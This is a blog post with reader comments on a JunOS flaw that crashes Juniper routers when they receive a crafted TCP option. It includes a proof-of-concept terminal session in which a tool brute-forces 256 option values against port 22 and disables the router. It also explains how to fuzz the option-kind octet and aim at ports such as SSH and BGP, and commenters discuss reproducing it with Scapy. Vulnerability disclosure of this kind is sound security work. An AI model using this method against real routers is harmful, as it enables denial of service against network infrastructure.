"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.
The JunOS kernel will crash (i.e. core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with Junos's firewall filter. A router receiving this specific TCP packet will crash and reboot.
Affected Devices:
JunOS 3.x - 10.x (versions released later then 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.
Solution:
Upgrade the OS. There are no totally effective workarounds.
Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
It's more than enough! We have 256 guesses ;)
Simple Proof-of-Concept demo:
hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>
hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK
hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C
256 packets and JunOS router is dead, and after analyze sniffing traffic we are know true "evil" TCP packet!
The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue!
Successful exploitation requires knowledge of a listening remote TCP port (opened or firewall filtered, it doesn't matter at all).
For example, attackers can send (blind) a many numbers of crafted packets to "well known" TCP ports (22/SSH, 179/BGP and other).
And That's enough.
Are you just looping through the first 8 bits of the TCP options header? Looking at the ol' TCP header diagram here it looks like TCP options + padding has 32 bits to muck with.
ReplyDeleteThx Ryan for comment.
ReplyDeleteOf course, tcp options have a variable length.
In the first testcase, i fuzzing only the option-kind octet:
option-kind octet - fuzzing
other octets - constants
And of course, full fuzzing - is much more than 8 bits, but not long too.
Thanks!
ReplyDeleteIt was late when I tried this, but I see now that the options are variable length. I looped through all the values in the option-kind octet (assuming only one option here), with a value octet of x00, then I tried just plain leaving the value off. I could do some captures here, but am using Scapy and I betcha it is properly padding out the option field... this requires an improperly padded field right?
Also see this blog + video:
ReplyDeletehttp://www.toonk.nl/blog/?p=522
seems that firewall filters do help to a certain extend.
This comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete